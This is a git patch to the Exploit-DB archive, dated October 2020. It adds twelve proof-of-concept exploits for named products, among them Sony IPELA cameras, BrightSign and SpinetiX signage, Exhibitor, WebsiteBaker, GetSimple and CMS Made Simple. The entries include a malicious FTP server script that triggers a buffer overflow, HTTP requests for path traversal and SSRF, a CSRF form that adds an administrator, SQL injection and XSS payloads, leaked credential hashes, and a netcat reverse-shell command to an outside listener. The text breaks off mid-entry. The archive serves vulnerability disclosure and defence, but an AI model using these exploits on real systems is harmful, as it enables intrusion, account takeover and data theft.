From f697a81a18f3eddacbdb3a2192f66bd28b2e739d Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 2 Oct 2020 05:02:08 +0000
Subject: [PATCH] DB: 2020-10-02

12 changes to exploits/shellcodes

Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow
BrightSign Digital Signage Diagnostic Web Server 8.2.26 - Server-Side Request Forgery (Unauthenticated)
BrightSign Digital Signage Diagnostic Web Server 8.2.26 - File Delete Path Traversal
SpinetiX Fusion Digital Signage 3.4.8 - Database Backup Disclosure
SpinetiX Fusion Digital Signage 3.4.8 - Cross-Site Request Forgery (Add Admin)
SpinetiX Fusion Digital Signage 3.4.8 - Username Enumeration
MonoCMS Blog 1.0 - Arbitrary File Deletion (Authenticated)
WebsiteBaker 2.12.2 - 'display_name' SQL Injection (authenticated)
GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting (Authenticated)
CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated)
Typesetter CMS 5.1 - 'Site Title' Persistent Cross-Site Scripting

Exhibitor Web UI 1.7.1 - Remote Code Execution
---
 exploits/hardware/remote/48842.py   | 91 +++++++++++++++++++++++++++++
 exploits/hardware/webapps/48843.txt | 49 ++++++++++++++++
 exploits/hardware/webapps/48844.txt | 83 ++++++++++++++++++++++++++
 exploits/hardware/webapps/48845.txt | 73 +++++++++++++++++++++++
 exploits/hardware/webapps/48846.txt | 57 ++++++++++++++++++
 exploits/hardware/webapps/48847.txt | 60 +++++++++++++++++++
 exploits/java/webapps/48654.txt     | 86 +++++++++++++++++++++++++++
 exploits/php/webapps/48848.txt      | 53 +++++++++++++++++
 exploits/php/webapps/48849.txt      | 46 +++++++++++++++
 exploits/php/webapps/48850.txt      | 57 ++++++++++++++++++
 exploits/php/webapps/48851.txt      | 31 ++++++++++
 exploits/php/webapps/48852.txt      | 43 ++++++++++++++
 files_exploits.csv                  | 12 ++++
 13 files changed, 741 insertions(+)
 create mode 100755 exploits/hardware/remote/48842.py
 create mode 100644 exploits/hardware/webapps/48843.txt
 create mode 100644 exploits/hardware/webapps/48844.txt
 create mode 100644 exploits/hardware/webapps/48845.txt
 create mode 100644 exploits/hardware/webapps/48846.txt
 create mode 100644 exploits/hardware/webapps/48847.txt
 create mode 100644 exploits/java/webapps/48654.txt
 create mode 100644 exploits/php/webapps/48848.txt
 create mode 100644 exploits/php/webapps/48849.txt
 create mode 100644 exploits/php/webapps/48850.txt
 create mode 100644 exploits/php/webapps/48851.txt
 create mode 100644 exploits/php/webapps/48852.txt

diff --git a/exploits/hardware/remote/48842.py b/exploits/hardware/remote/48842.py
new file mode 100755
index 000000000..b73ad7657
--- /dev/null
+++ b/exploits/hardware/remote/48842.py
@@ -0,0 +1,91 @@
+# Exploit Title: Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow
+# Google Dork: Server: Mida eFramework
+# Date: 2020-09-30
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://pro.sony
+# Version: <= 1.82.01
+
+#!/usr/bin/env python
+#
+#
+# Sony IPELA Network Camera (ftpclient.cgi) Remote Stack Buffer Overflow
+#
+#
+# Vendor: Sony Electronics Inc.
+# Product web page: https://pro.sony
+# Affected version: SNC-DH120T v1.82.01
+#
+#
+# Summary: IPELA is Sony's vision of the ultimate workplace, designed to revolutionize
+# the way business communicates over global IP networks. IPELA products can improve the
+# efficiency of your organization by connecting people and places with high-quality audio
+# and video. The SNC-DH120T is an indoor tamper proof, high definition (720p) minidome
+# network security camera with Electronic Day/Night settings, DEPA analysis and is ONVIF
+# compliant. It supports dual streaming of H.264, MPEG-4 and JPEG at full frame-rate.
+#
+# Desc: The vulnerability is caused due to a boundary error in the processing of received
+# FTP traffic through the FTP client functionality (ftpclient.cgi), which can be exploited
+# to cause a stack-based buffer overflow when a user issues a POST request to connect to a
+# malicious FTP server. Successful exploitation could allow execution of arbitrary code on
+# the affected device or cause denial of service scenario.
+#
+# Tested on: gen5th/1.x
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2020-5596
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5596.php
+# Fixed in 1.88.0.0: https://pro.sony/en_NL/support-resources/snc-dh120/software/mpengb00000928
+#
+#
+# 28.10.2019
+# 
+
+
+# PoC:
+
+# Trigger:
+# curl 'http://10.0.0.3:5080/command/ftpclient.cgi' \
+#   -H 'Connection: keep-alive' \
+#   -H 'Cache-Control: max-age=0' \
+#   -H 'Authorization: Basic YWRtaW46YWRtaW4=' \
+#   -H 'Upgrade-Insecure-Requests: 1' \
+#   -H 'Origin: http://10.0.0.3:5080' \
+#   -H 'Content-Type: application/x-www-form-urlencoded' \
+#   -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36' \
+#   -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
+#   -H 'Referer: http://81.83.17.200:5080/en/l4/ftp/common.html' \
+#   -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
+#   --data 'FtpClientFunc=on&FcServerName=10.0.0.5&FcUserName=EVIL&FcPassword=NONESO&FcPassive=off&reload=referer' \
+#   --compressed \
+#   --insecure
+#
+#
+
+# Observed fixed version log:
+# 2020-07-27 17:48:03 FTP client Unexpected error occurred during FTP client operation.
+#
+
+
+import socket
+
+HOST = '127.0.0.1' # 10.0.0.5
+PORT = 21
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.bind((HOST, PORT))
+s.listen(1)
+conn, addr = s.accept()
+print 'Connection from', addr
+while True:
+    data = conn.recv(1024)
+    if not data:
+        break
+    evil  = "A" * 100000
+    evil += "B" * 10000
+    evil += "C" * 1000
+    conn.sendall(evil+'\n')
+    s.close()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48843.txt b/exploits/hardware/webapps/48843.txt
new file mode 100644
index 000000000..cd802da0d
--- /dev/null
+++ b/exploits/hardware/webapps/48843.txt
@@ -0,0 +1,49 @@
+# Exploit Title: BrightSign Digital Signage Diagnostic Web Server 8.2.26 - Server-Side Request Forgery (Unauthenticated)
+# Date: 2020-09-30
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.brightsign.biz
+# Version: <= 8.2.26
+
+BrightSign Digital Signage Diagnostic Web Server 8.2.26 Unauthenticated SSRF
+
+
+Vendor: BrightSign, LLC
+Product web page: https://www.brightsign.biz
+Affected version: Model: XT, XD, HD, LS
+                  Firmware / OS version: <=8.2.26
+
+
+Summary: BrightSign designs media players and provides free software
+and cloud networking solutions for the commercial digital signage market
+worldwide, serving all vertical segments of the marketplace.
+
+Desc: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability
+exists in the BrightSign digital signage media player affecting the
+Diagnostic Web Server (DWS). The application parses user supplied data
+in the 'url' GET parameter to construct a diagnostics request to the
+Download Speed Test service. Since no validation is carried out on the
+parameter, an attacker can specify an external domain and force the
+application to make an HTTP request to an arbitrary destination host.
+This can be used by an external attacker for example to bypass firewalls
+and initiate a service and network enumeration on the internal network
+through the affected application.
+
+Tested on: roNodeJS
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5595
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5595.php
+
+
+01.08.2020
+
+--
+
+
+PoC:
+
+# curl http://10.0.0.17/speedtest?url=127.0.0.1:22
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48844.txt b/exploits/hardware/webapps/48844.txt
new file mode 100644
index 000000000..0111d1656
--- /dev/null
+++ b/exploits/hardware/webapps/48844.txt
@@ -0,0 +1,83 @@
+# Exploit Title: SpinetiX Fusion Digital Signage 3.4.8 - File Delete Path Traversal
+# Date: 2020-09-30
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.spinetix.com
+# Version: <= 8.2.26
+
+SpinetiX Fusion Digital Signage 3.4.8 File Backup/Delete Path Traversal
+
+
+Vendor: SpinetiX AG
+Product web page: https://www.spinetix.com
+Affected version: <= 3.4.8 (1.0.36274)
+
+Summary: At SpinetiX we inspire businesses to unlock the potential of their story.
+We believe in the power of digital signage as a dynamic new storytelling platform
+to engage with people. For more than 13 years, we have been constantly innovating
+to deliver cutting-edge digital signage solutions that help our customers shine.
+Fusion is a built-in content management application accessible from a standard web
+browser - it is pre-installed on every HMP200, HMP130, and HMP100 device, and does
+not require any additional license, cost, or software installation.
+
+Desc: The application suffers from an authenticated path traversal vulnerability.
+Input passed via several parameters in index.php script is not properly verified
+before being used to create and delete files. This can be exploited to write backup
+files to an arbitrary location and/or delete arbitrary files via traversal attacks. 
+
+Tested on: Apache 2.2.34
+           PHP/5.3.18-2
+           Linux 2.6.10
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5594
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5594.php
+
+
+03.08.2020
+
+--
+
+
+File Backup Path Traversal:
+---------------------------
+
+POST /fusion/index.php?r=backup/create HTTP/1.1
+Host: 192.168.1.1
+Content-Length: 62
+Accept: */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mooshoo/1.2
+Content-Type: application/x-www-form-urlencoded
+Origin: http://192.168.1.1
+Referer: http://192.168.1.1/fusion/index.php?r=settings/settings
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: fusionsess=vb5se309b2seig780p47ch0pn1
+Connection: close
+
+SystemBackup%5Bname%5D=..%2Ftest&SystemBackup%5Bbackupall%5D=0
+
+
+File Delete (test.7z) Path Traversal:
+-------------------------------------
+
+GET /fusion/index.php?r=backup/delete&id=backup%3A../test&_=1600981467420 HTTP/1.1
+Host: 192.168.1.1
+
+
+Arbitrary File Delete Null Terminated String Extension Bypass Path Traversal:
+-----------------------------------------------------------------------------
+
+GET /fusion/index.php?r=backup/delete&id=backup%3A../scripts/layouttheme.js%00&_=1600981467420 HTTP/1.1
+Host: 192.168.1.1
+
+
+Arbitrary Image Delete:
+-----------------------
+
+GET /fusion/index.php?r=files/delete&id=image%3A../dirtysecret.svg&_=1601128841154 HTTP/1.1
+Host: 192.168.1.1
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48845.txt b/exploits/hardware/webapps/48845.txt
new file mode 100644
index 000000000..f5e9416d2
--- /dev/null
+++ b/exploits/hardware/webapps/48845.txt
@@ -0,0 +1,73 @@
+# Exploit Title: SpinetiX Fusion Digital Signage 3.4.8 - Database Backup Disclosure
+# Date: 2020-09-30
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.spinetix.com
+# Version: <= 8.2.26
+
+SpinetiX Fusion Digital Signage 3.4.8 Database Backup Disclosure
+
+
+Vendor: SpinetiX AG
+Product web page: https://www.spinetix.com
+Affected version: <= 3.4.8 (1.0.36274)
+
+Summary: At SpinetiX we inspire businesses to unlock the potential of their story.
+We believe in the power of digital signage as a dynamic new storytelling platform
+to engage with people. For more than 13 years, we have been constantly innovating
+to deliver cutting-edge digital signage solutions that help our customers shine.
+Fusion is a built-in content management application accessible from a standard web
+browser - it is pre-installed on every HMP200, HMP130, and HMP100 device, and does
+not require any additional license, cost, or software installation.
+
+Desc: The application is vulnerable to unauthenticated database download and information
+disclosure vulnerability. This can enable an attacker to disclose sensitive information
+resulting in authentication bypass, session hijacking and full system control.
+
+Tested on: Apache 2.2.34
+           PHP/5.3.18-2
+           Linux 2.6.10
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5593
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5593.php
+
+
+03.08.2020
+
+--
+
+
+Request:
+--------
+
+GET /content/files/backups/ HTTP/1.0
+Host: 192.168.1.1
+
+Response:
+---------
+
+HTTP/1.1 200 OK
+Date: Wed, 26 Aug 2020 15:57:40 GMT
+Server: Apache/2.2.22 (Unix)
+X-spinetix-firmware: 3.0.6-1.0.21932
+X-raperca-version: 3.0.6-1.0.21912
+X-spinetix-serial: 001d400027b8
+X-spinetix-hw: BonsaiT
+Content-Length: 636
+Connection: close
+Content-Type: text/html;charset=UTF-8
+
+
+Index of /content/files/backups
+Name                    Last modified      Size  Description
+Parent Directory                           -   
+Custom1337Name.7z       25-Aug-2020 10:06  1.0M  
+
+Extracting the .7z shows userpwd.txt file, cat userpwd.txt:
+
+admin:e10adc3949ba59abbe56e057f20f883e:file,program,activate,layout,playlist,model,slide,edit,admin::0
+testingus:b874da212a62786181c66c5bbaabf425:file,program,activate,layout,playlist,model,slide,edit,admin:se:1
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48846.txt b/exploits/hardware/webapps/48846.txt
new file mode 100644
index 000000000..c8bc6737c
--- /dev/null
+++ b/exploits/hardware/webapps/48846.txt
@@ -0,0 +1,57 @@
+# Exploit Title: SpinetiX Fusion Digital Signage 3.4.8 - Cross-Site Request Forgery (Add Admin)
+# Date: 2020-09-30
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.spinetix.com
+# Version: <= 8.2.26
+
+SpinetiX Fusion Digital Signage 3.4.8 CSRF Add Admin Exploit
+
+
+Vendor: SpinetiX AG
+Product web page: https://www.spinetix.com
+Affected version: <= 3.4.8 (1.0.36274)
+
+Summary: At SpinetiX we inspire businesses to unlock the potential of their story.
+We believe in the power of digital signage as a dynamic new storytelling platform
+to engage with people. For more than 13 years, we have been constantly innovating
+to deliver cutting-edge digital signage solutions that help our customers shine.
+Fusion is a built-in content management application accessible from a standard web
+browser - it is pre-installed on every HMP200, HMP130, and HMP100 device, and does
+not require any additional license, cost, or software installation.
+
+Desc: The application interface allows users to perform certain actions via HTTP
+requests without performing any validity checks to verify the requests. This can
+be exploited to perform certain actions with administrative privileges if a logged-in
+user visits a malicious web site.
+
+Tested on: Apache 2.2.34
+           PHP/5.3.18-2
+           Linux 2.6.10
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5592
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5592.php
+
+
+03.08.2020
+
+--
+
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/index.php?r=settings/settings')</script>
+    <form action="http://192.168.1.1/fusion/index.php?r=users/create" method="POST">
+      <input type="hidden" name="User[username]" value="" />
+      <input type="hidden" name="User[username]" value="ZSL" />
+      <input type="hidden" name="User[new_password]" value="testingus" />
+      <input type="hidden" name="User[repeat_password]" value="testingus" />
+      <input type="hidden" name="User[userRoles]" value="Administrator" />
+      <input type="submit" value="Forge!" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48847.txt b/exploits/hardware/webapps/48847.txt
new file mode 100644
index 000000000..32580193c
--- /dev/null
+++ b/exploits/hardware/webapps/48847.txt
@@ -0,0 +1,60 @@
+# Exploit Title: SpinetiX Fusion Digital Signage 3.4.8 - Username Enumeration
+# Date: 2020-09-30
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.spinetix.com
+# Version: <= 8.2.26
+
+SpinetiX Fusion Digital Signage 3.4.8 Username Enumeration Weakness
+
+
+Vendor: SpinetiX AG
+Product web page: https://www.spinetix.com
+Affected version: <= 3.4.8 (1.0.36274)
+
+Summary: At SpinetiX we inspire businesses to unlock the potential of their story.
+We believe in the power of digital signage as a dynamic new storytelling platform
+to engage with people. For more than 13 years, we have been constantly innovating
+to deliver cutting-edge digital signage solutions that help our customers shine.
+Fusion is a built-in content management application accessible from a standard web
+browser - it is pre-installed on every HMP200, HMP130, and HMP100 device, and does
+not require any additional license, cost, or software installation.
+
+Desc: The weakness is caused due to the login script and how it verifies provided
+credentials. Attacker can use this weakness to enumerate valid users on the affected
+node.
+
+Tested on: Apache 2.2.34
+           PHP/5.3.18-2
+           Linux 2.6.10
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5591
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5591.php
+
+
+03.08.2020
+
+--
+
+
+POST /fusion/index.php?r=users/login HTTP/1.1
+Host: 192.168.1.1
+
+User[username]=NonExisting&User[password]=blah&User[rememberMe]=0&yt0.x=0&yt0.y=0
+
+Response: Username is incorrect.
+HTML: <div class="user_password login"><div class="errorLogin">Username is incorrect.</div>
+
+---
+
+POST /fusion/index.php?r=users/login HTTP/1.1
+Host: 192.168.1.1
+
+User[username]=admin&User[password]=blah&User[rememberMe]=0&yt0.x=0&yt0.y=0
+
+Response: Password is incorrect.
+HTML: <div class="user_password login"><div class="errorLogin">Password is incorrect.</div>
\ No newline at end of file
diff --git a/exploits/java/webapps/48654.txt b/exploits/java/webapps/48654.txt
new file mode 100644
index 000000000..b76673ce9
--- /dev/null
+++ b/exploits/java/webapps/48654.txt
@@ -0,0 +1,86 @@
+# Exploit Title: Exhibitor Web UI 1.7.1 - Remote Code Execution
+# Date: 2019-11-13
+# Exploit Author: Logan Sanderson
+# Web Site: https://github.com/soabase/exhibitor/wiki/Running-Exhibitor
+# Version : 1.7.1
+# CVE : CVE-2019-5029
+
+Exhibitor UI command injection vulnerability
+November 13, 2019
+CVE Number
+
+CVE-2019-5029
+Summary
+
+An exploitable command injection vulnerability exists in the Config editor of the Exhibitor Web UI versions 1.0.9 to 1.7.1. Arbitrary shell commands surrounded by backticks or $() can be inserted into the editor and will be executed by the Exhibitor process when it launches ZooKeeper. An attacker can execute any command as the user running the Exhibitor process.
+Tested Versions
+
+Tested version was compiled using the standalone pom.xml from the Exhibitor master branch.
+
+(Note that the latest released version is labeled 1.7.1, but the version in the exhibitor-standalone’s pom.xml is set to 1.6.0.)
+
+The vulnerability should affect all versions at least as far back as 1.0.9, when the javaEnvironment variable was added.
+Product URLs
+
+https://github.com/soabase/exhibitor
+CVSSv3 Score
+
+9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+CWE
+
+CWE-78 - Improper Neutralization of Special Elements used in an OS Command
+Details
+
+Exhibitor is a ZooKeeper supervisory process, which is described in the ZooKeeper documentation.
+
+Since the ZooKeeper server will exit on an error, the Apache ZooKeeper documentation suggests a supervisory process that manages the ZooKeeper server process, mainly for the purpose of restarting ZooKeeper when it exits.
+
+Exhibitor’s Web UI does not have any form of authentication, and prior to version 1.7.0, did not have any way to specify which interfaces to listen on. Exposing Exhibitor is dangerous for the ZooKeeper ensemble because Exhibitor allows the changing of the ZooKeeper configuration, and also provides a UI for viewing and modifying keys and values stored in ZooKeeper.
+
+By default, the Exhibitor Web UI listens on TCP 8080. However, since this port is commonly used, it may be common to find it on other ports as well.
+
+Under the Config tab in the Exhibitor Web UI, the “java.env script” field can be modified and the new configuration pushed to ZooKeeper. Exhibitor launches ZooKeeper through a script, and the contents of this field are passed, unmodified, as arguments to the Java command to launch ZooKeeper, which can be seen here.
+
+(The contents of the “java.env script” field are passed in as $JVMFLAGS.)
+
+Based on how this argument is passed, there are several ways to execute arbitrary commands. The methods tested were surrounding the command with backticks and using $(), for example:
+
+$(/bin/nc -e /bin/sh 10.0.0.64 4444 &)
+
+This example uses netcat to open a reverse shell to a listener on 10.0.0.64:4444.
+
+In the example, ZooKeeper will still launch successfully after the command executes, and it will run the command every time ZooKeeper is re-launched by Exhibitor.
+Exploit Proof of Concept
+
+The included screenshots show the process of obtaining a root shell on the system.
+
+The steps to exploit it from a web browser:
+
+    Open the Exhibitor Web UI and click on the Config tab, then flip the Editing switch to ON
+
+    In the “java.env script” field, enter any command surrounded by $() or ``, for example, for a simple reverse shell:
+
+    $(/bin/nc -e /bin/sh 10.0.0.64 4444 &)
+    Click Commit > All At Once > OK
+    The command may take up to a minute to execute.
+
+It can also be performed with a single curl command:
+
+command: curl -X POST -d @data.json http://10.0.0.200:8080/exhibitor/v1/config/set
+
+data.json: { “zookeeperInstallDirectory”: “/opt/zookeeper”, “zookeeperDataDirectory”: “/opt/zookeeper/snapshots”, “zookeeperLogDirectory”: “/opt/zookeeper/transactions”, “logIndexDirectory”: “/opt/zookeeper/transactions”, “autoManageInstancesSettlingPeriodMs”: “0”, “autoManageInstancesFixedEnsembleSize”: “0”, “autoManageInstancesApplyAllAtOnce”: “1”, “observerThreshold”: “0”, “serversSpec”: “1:exhibitor-demo”, “javaEnvironment”: “$(/bin/nc -e /bin/sh 10.0.0.64 4444 &)”, “log4jProperties”: “”, “clientPort”: “2181”, “connectPort”: “2888”, “electionPort”: “3888”, “checkMs”: “30000”, “cleanupPeriodMs”: “300000”, “cleanupMaxFiles”: “20”, “backupPeriodMs”: “600000”, “backupMaxStoreMs”: “21600000”, “autoManageInstances”: “1”, “zooCfgExtra”: { “tickTime”: “2000”, “initLimit”: “10”, “syncLimit”: “5”, “quorumListenOnAllIPs”: “true” }, “backupExtra”: { “directory”: “” }, “serverId”: 1 }
+Mitigation
+
+Since Exhibitor has no built-in authentication, it would be helpful to limit the interfaces it listens on to only trusted networks, or require authentication using something like an nginx reverse proxy and block all other access using firewall rules.
+
+If the features provided by the Exhibitor Web UI are not needed and the only needed functionality is managing the ZooKeeper process, it should be replaced with a simpler ZooKeeper supervisor solution, such as a systemd service.
+Timeline
+
+2019-03-08 - Vendor Disclosure
+2019-05-01 - GitHub issue #389 created; Vendor advised point of contact changed. Copy of report sent to new point of contact
+2019-05-14 - (75 day) 3rd follow up with vendor
+2019-05-29 - Final notice of public disclosure release
+2019-11-13 - Public Release
+Credit
+
+Discovered by Logan Sanderson of Cisco ASIG.
\ No newline at end of file
diff --git a/exploits/php/webapps/48848.txt b/exploits/php/webapps/48848.txt
new file mode 100644
index 000000000..7a30d7cb6
--- /dev/null
+++ b/exploits/php/webapps/48848.txt
@@ -0,0 +1,53 @@
+# Exploit Title: MonoCMS Blog 1.0 - Arbitrary File Deletion (Authenticated)
+# Date: 2020-09-20
+# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
+# Vendor Homepage: https://monocms.com/download
+# Software Link: https://monocms.com/download
+# Version: 1.0
+# Tested On: Windows 10 (XAMPP)
+# CVE: N/A
+
+Proof of Concept:
+1.	In the upload images page, make a request to delete an already uploaded image. If no image present, upload an image and then make a request to delete that image.
+2.	Notice the Request URL
+<ip>/base_path_to_cms/uploads?delimg=../../../../../Temp/Copy.txt
+This deletes the file ‘copy.txt’ from C:\Temp
+3.	Use simple directory traversals to delete arbitrary files.
+
+Note: php files can be unlinked and not deleted.
+
+
+===========================================================================================================================
+###########################################################################################################################
+===========================================================================================================================
+
+# Exploit Title: MonoCMS Blog - Account Takeover (CSRF)
+# Date: September 29th, 2020
+# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
+# Vendor Homepage: https://monocms.com/download
+# Software Link: https://monocms.com/download
+# Version: 1.0
+# Tested On: Windows 10 (XAMPP)
+# CVE: CVE-2020-25986
+
+
+Proof of Concept:
+Login using a test user (attacker). Make a password change request, and enter a new password and then intercept the request (in BurpSuite). Generate a CSRF PoC. Save the HTML code in an html file. Login as another user (victim), open the CSRF-PoC html file, and click on submit request. Victim user’s password will be changed.
+
+
+===========================================================================================================================
+###########################################################################################################################
+===========================================================================================================================
+
+# Exploit Title: MonoCMS Blog - Sensitive Information Disclosure (Hardcoded Credentials)
+# Date: September 29th, 2020
+# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
+# Vendor Homepage: https://monocms.com/download
+# Software Link: https://monocms.com/download
+# Version: 1.0
+# Tested On: Windows 10 (XAMPP)
+# CVE: CVE-2020-25987
+
+
+Proof of Concept:
+Hard-coded admin and user hashes can be found in the “log.xml” file in the source-code files for MonoCMS Blog. Hash type is bcrypt and hashcat mode 3200 can be used to crack the hash.
\ No newline at end of file
diff --git a/exploits/php/webapps/48849.txt b/exploits/php/webapps/48849.txt
new file mode 100644
index 000000000..a42171336
--- /dev/null
+++ b/exploits/php/webapps/48849.txt
@@ -0,0 +1,46 @@
+# Exploit Title: WebsiteBaker 2.12.2 - 'display_name' SQL Injection (authenticated)
+# Google Dork: -
+# Date: 2020-09-20
+# Exploit Author: Roel van Beurden
+# Vendor Homepage:  https://websitebaker.org
+# Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
+# Version: 2.12.2
+# Tested on: Linux Ubuntu 18.04
+# CVE: CVE-2020-25990
+
+
+1. Description:
+----------------------
+WebsiteBaker 2.12.2 allows SQL Injection via parameter 'display_name' in /websitebaker/admin/preferences/save.php.
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+
+2. Proof of Concept:
+----------------------
+In Burpsuite intercept the request from /websitebaker/admin/preferences/save.php and save it like burp.req
+Then run SQLmap to extract the data from the database:
+
+sqlmap -r burp.req --risk=3 --level=5 --dbs --random-agent
+
+
+3. Example payload:
+----------------------
+display_name=Administrator" AND (SELECT 9637 FROM (SELECT(SLEEP(5)))ExGN)-- Cspz&language=EN&timezone=system_default&date_format=M d Y&time_format=g:i A&email=admin@example.com&new_password_1=&new_password_2=&current_password=&submit=Save&dd114892c1676ce3=j_5rdRnI_TarPQu7QmVVuw
+
+
+4. Burpsuite request:
+----------------------
+POST /websitebaker/admin/preferences/save.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/websitebaker/admin/preferences/index.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 228
+Connection: close
+Cookie: wb-8123-sid=otfjsmqu8vljs9737crkcm8nec
+Upgrade-Insecure-Requests: 1
+
+display_name=Administrator&language=EN&timezone=system_default&date_format=M+d+Y&time_format=g%3Ai+A&email=admin%40example.com&new_password_1=&new_password_2=&current_password=&submit=Save&dd114892c1676ce3=j_5rdRnI_TarPQu7QmVVuw
\ No newline at end of file
diff --git a/exploits/php/webapps/48850.txt b/exploits/php/webapps/48850.txt
new file mode 100644
index 000000000..3791581ab
--- /dev/null
+++ b/exploits/php/webapps/48850.txt
@@ -0,0 +1,57 @@
+# Exploit Title: GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting (Authenticated)
+# Google Dork: -
+# Date: 2020-09-29
+# Exploit Author: Roel van Beurden
+# Vendor Homepage: http://get-simple.info
+# Software Link: http://get-simple.info/download
+# Version: 3.3.16
+# Tested on: Linux Ubuntu 18.04
+# CVE: N/A
+
+
+1. Description:
+----------------------
+GetSimple CMS 3.3.16 allows in parameter 'permalink' on the Settings page persistent Cross Site Scripting which is executed when you create and open a new page.
+
+
+3. Affected parameter:
+----------------------
+'permalink' on /admin/settings.php
+
+
+3. Exploitation steps:
+----------------------
+1: Create a new page
+2: Go to Settings on the right top of the page
+3: Add XSS payload to "Custom Permalink Structure" text field
+4: Save Settings
+5: Go to the tab 'pages' to trigger the XSS alert popup
+
+
+3: Example payload:
+----------------------
+"><img src=x onerror=alert('XSS')>
+
+
+4: Burp Request:
+----------------------
+POST /GetSimpleCMS-3.3.16/admin/settings.php HTTP/1.1
+
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/GetSimpleCMS-3.3.16/admin/settings.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 349
+Connection: close
+Cookie: __atuvc=22%7C39; __atuvs=5f689d4d88949892015; GS_ADMIN_USERNAME=admin; d46405c5e4a3aa8c65850d4fa6ba75e926569261=1995ba85457ab3e86fa5e01f9ed5267cf9775880
+Upgrade-Insecure-Requests: 1
+
+nonce=c4577f17fac90ca1b8306ce48571c27a0a7923ec&sitename=GetSimple+Test+VM&siteurl=http%3A%2F%2F127.0.0.1%2FGetSimpleCMS-3.3.16%2F&prettyurls=1&permalink=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27XSS%27%29%3E&user=admin&email=admin%40example.org&name=&timezone=&lang=en_US&show_htmleditor=1&sitepwd=&sitepwd_confirm=&submitted=Save+Settings
+
+
+5: Exploitation demo:
+----------------------
+https://www.youtube.com/watch?v=8IMfD5KGt_U
\ No newline at end of file
diff --git a/exploits/php/webapps/48851.txt b/exploits/php/webapps/48851.txt
new file mode 100644
index 000000000..e56618230
--- /dev/null
+++ b/exploits/php/webapps/48851.txt
@@ -0,0 +1,31 @@
+# Exploit Title: CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated)
+# Google Dork: -
+# Date: 2020-09-29
+# Exploit Author: Roel van Beurden
+# Vendor Homepage: https://www.cmsmadesimple.org/
+# Software Link: http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip
+# Version: 2.2.14
+# Tested on: Linux Ubuntu 18.04
+# CVE: CVE-2020-24860
+
+
+1. Description:
+----------------------
+CMS Made Simple 2.2.14 allows an authenticated user with access to the Content Manager to edit content and put persistent XSS payload in the affected text fields. The user
+can get cookies from every authenticated user who visits the website.
+
+
+2. Affected parameters:
+----------------------
